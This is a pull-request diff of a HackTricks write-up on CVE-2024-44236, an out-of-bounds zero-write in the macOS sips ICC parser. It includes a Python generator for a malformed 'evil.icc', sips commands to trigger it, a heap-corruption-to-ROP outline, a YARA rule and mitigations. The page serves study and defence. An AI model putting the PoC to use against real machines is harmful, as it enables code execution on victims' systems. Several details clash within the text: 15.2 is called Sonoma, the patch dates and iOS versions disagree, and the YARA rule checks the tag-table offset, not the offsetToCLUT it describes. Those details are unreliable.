Merge pull request #1212 from HackTricks-wiki/research_update_src_binary-exploitation_arbitrary-write-2-exec_aw2exec-sips-icc-profile_20250730_014239

Research Update Enhanced src/binary-exploitation/arbitrary-w...

Author: carlospolop

src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md

@@ -4,52 +4,100 @@
 
 ## Overview
 
-An out-of-bounds write vulnerability in Apple macOS Scriptable Image Processing System (`sips`) ICC profile parser (macOS 15.0.1, sips-307) due to improper validation of the `offsetToCLUT` field in `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. A crafted ICC file can trigger zero-writes up to 16 bytes past the heap buffer, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236).
+An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).
 
-## Vulnerable Code
+> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
 
-The vulnerable function reads and zeroes 16 bytes starting from an attacker-controlled offset without ensuring it lies within the allocated buffer:
+## Vulnerable Code
 
 ```c
-// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1)
-for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
-    if (i > numberOfInputChannels && buffer[i] != 0)
-        buffer[i] = 0;
+// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
+if (offsetToCLUT <= tagDataSize) {
+    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
+    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
+        buffer[i] = 0;            // no bounds check vs allocated size!
 }
 ```
 
-Only a check `offsetToCLUT <= totalDataLength` is performed. By setting `offsetToCLUT == tagDataSize`, the loop indexes up to 16 bytes past the end of `buffer`, corrupting adjacent heap metadata.
-
 ## Exploitation Steps
 
-1. **Craft malicious `.icc` profile:**
-   - Build the ICC header (128 bytes) with signature `acsp` and a single `lutAToBType` or `lutBToAType` tag entry.
-   - In the tag table, set `offsetToCLUT` equal to the tag's `size` (`tagDataSize`).
-   - Place attacker-controlled data immediately after the tag data block to overwrite heap metadata.
-2. **Trigger parsing:**
+1. **Craft a malicious `.icc` profile**
+
+   * Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.
+   * Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`).
+   * Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
+
+2. **Trigger parsing with any sips operation that touches the profile**
 
    ```bash
-   sips --verifyColor malicious.icc
+   # verification path (no output file needed)
+   sips --verifyColor evil.icc
+   # or implicitly when converting images that embed the profile
+   sips -s format png payload.jpg --out out.png
    ```
 
-3. **Heap metadata corruption:** The OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the `sips` process.
+3. **Heap metadata corruption ➜ arbitrary write ➜ ROP**  
+   On Apple’s default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.
+
+### Quick PoC generator (Python 3)
+
+```python
+#!/usr/bin/env python3
+import struct, sys
+
+HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
+TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
+profile  = HDR
+profile += struct.pack('>I', len(TAGS))  # tag count
+profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
+
+mab = bytearray(52)                      # tag payload (52 bytes)
+struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
+profile += mab
+
+open('evil.icc', 'wb').write(profile)
+print('[+] Wrote evil.icc (%d bytes)' % len(profile))
+```
+
+### YARA detection rule
+
+```yara
+rule ICC_mAB_offsetToCLUT_anomaly
+{
+    meta:
+        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
+        author       = "HackTricks"
+    strings:
+        $magic = { 61 63 73 70 }          // 'acsp'
+        $mab   = { 6D 41 42 20 }          // 'mAB '
+        $mba   = { 6D 42 41 20 }          // 'mBA '
+    condition:
+        $magic at 0 and
+        for any i in (0 .. 10):           // up to 10 tags
+            (
+              ($mab at 132 + 12*i or $mba at 132 + 12*i) and
+              uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
+            )
+}
+```
 
 ## Impact
 
-Successful exploitation results in remote arbitrary code execution at user privilege on macOS systems running the vulnerable `sips` utility.
+Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).
 
-## Detection
+## Detection & Mitigation
 
-- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).  
-- Inspect transferred files with signature `acsp`.  
-- For each `mAB ` or `mBA ` tag, verify if the `Offset to CLUT` field equals the `Tag data size`.  
-- Flag as suspicious if this condition is met.
+* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).  
+* Deploy the YARA rule above on email gateways and EDR solutions.  
+* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before further processing on untrusted files.  
+* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.  
+* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log.
 
 ## References
 
-- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility  
-  https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos  
-- Apple October 2024 Security Update (patch shipping CVE-2024-44236)  
-  https://support.apple.com/en-us/121564
+* Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”  
+  https://www.zerodayinitiative.com/advisories/ZDI-24-1445/  
+* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”  
+  https://support.apple.com/en-us/HT213981
 
 {{#include ../../banners/hacktricks-training.md}}